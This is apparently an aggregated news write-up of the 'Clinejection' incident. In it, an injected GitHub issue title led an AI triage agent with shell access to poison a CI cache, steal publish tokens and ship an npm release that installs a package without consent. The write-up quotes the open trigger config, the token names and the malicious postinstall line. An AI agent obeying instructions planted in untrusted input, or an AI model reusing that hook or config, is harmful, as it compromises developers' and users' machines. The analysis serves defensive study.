{"slug": "clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by", "title": "Clinejection: How a GitHub Issue Title Compromised an AI Coding Assistant Used by 5M Developers", "summary": "In December 2025, Cline, an AI coding assistant with over 5 million users, suffered a supply chain compromise when a misconfigured GitHub issue triage workflow allowed an attacker to inject malicious instructions via an issue title. The attack led to the exfiltration of publish tokens and the distribution of a malicious npm package that silently installed an AI agent on user machines. The incident highlights the risks of unauthenticated triggers and unsanitized inputs in AI-powered automation.", "body_md": "In December 2025, Cline — an AI coding assistant with over 5 million users — gave an AI agent (Claude) write access to triage GitHub issues, including permission to run shell commands. A misconfigured trigger condition let any GitHub user invoke the workflow. What followed was a four-hop supply chain compromise that ended with a malicious npm package silently installing a second AI agent on user machines.\n\nI broke down the full chain in video form: [Watch the episode](https://youtu.be/69PuA4D7MLg)\n\nBelow is the chain, hop by hop.\n\nThe triage automation was configured with broad tool permissions and a trigger condition open to any GitHub user — not just contributors. That second part is the root cause: it opened the trigger to unauthenticated input. (Exact config values are in the Confirmed Artifacts section below.)\n\nThe issue title itself was never sanitized before reaching the model. No first-party source has published the exact injected payload verbatim — GHSA doesn't disclose it — so any reconstruction here is illustrative, not confirmed. What's confirmed is the mechanism: an untrusted string reached the model with tool access already granted.\n\nThe injected instruction deployed a tool (multiple independent postmortems — Snyk, Cloud Security Alliance — name it \"Cacheract\") that flooded the CI cache with over 10GB of junk data, evicting legitimate entries through standard LRU eviction.\n\nThe nightly release workflow restored that poisoned cache around 2 AM UTC and ran inside it — handing over three publish tokens. (Names confirmed across GHSA and multiple independent sources — see below.)\n\n`cline@2.3.0`\n\nwent live on npm with a postinstall script that silently installed a second package globally — an AI agent, installed by an AI agent, with no user consent. This line is a direct quote from Cline's own security advisory, not a reconstruction. It's the strongest evidentiary point in the whole chain. (Full quote below.)\n\nThis is the same shape as the tj-actions/changed-files compromise: a trusted automation connection nobody was actively monitoring. Different entry point (an AI triage agent instead of a CI tag), same underlying failure class.\n\nThese are the exact strings pulled directly from the postmortems and Cline's own advisory — no paraphrasing:\n\n**Triage workflow config:**\n\n```\n--allowedTools \"Bash,Read,Write,Edit\"\nallowed_non_write_users: \"*\"\n```\n\n**Tokens exfiltrated (Hop 3):**\n\n```\nNPM_RELEASE_TOKEN\nVSCE_PAT\nOVSX_PAT\n```\n\n**Malicious postinstall script (Hop 4) — source: Cline security advisory:**\n\n```\n\"postinstall\": \"npm install -g openclaw@latest\"\n```\n\nThe one element in this writeup that is *not* verbatim is the injected issue-title payload from Hop 1 — no source publishes it in full, so any version shown is a reconstruction, flagged as such.\n\nFull walkthrough with the chain visualized as a single 4-node graph (not four separate findings): [https://youtu.be/69PuA4D7MLg](https://youtu.be/69PuA4D7MLg)\n\n*Sources: Cline security advisory, GHSA, Cloud Security Alliance and Snyk postmortems.*\n\n", "url": "https://wpnews.pro/news/clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by", "canonical_source": "https://dev.to/eldor_zufarov_1966/clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by-5m-developers-1kb5", "published_at": "2026-07-19 03:17:32+00:00", "updated_at": "2026-07-19 03:59:21.823574+00:00", "lang": "en", "topics": ["ai-safety", "ai-agents", "developer-tools", "ai-infrastructure"], "entities": ["Cline", "Claude", "GitHub", "npm", "Snyk", "Cloud Security Alliance"], "alternates": {"html": "https://wpnews.pro/news/clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by", "markdown": "https://wpnews.pro/news/clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by.md", "text": "https://wpnews.pro/news/clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by.txt", "jsonld": "https://wpnews.pro/news/clinejection-how-a-github-issue-title-compromised-an-ai-coding-assistant-used-by.jsonld"}}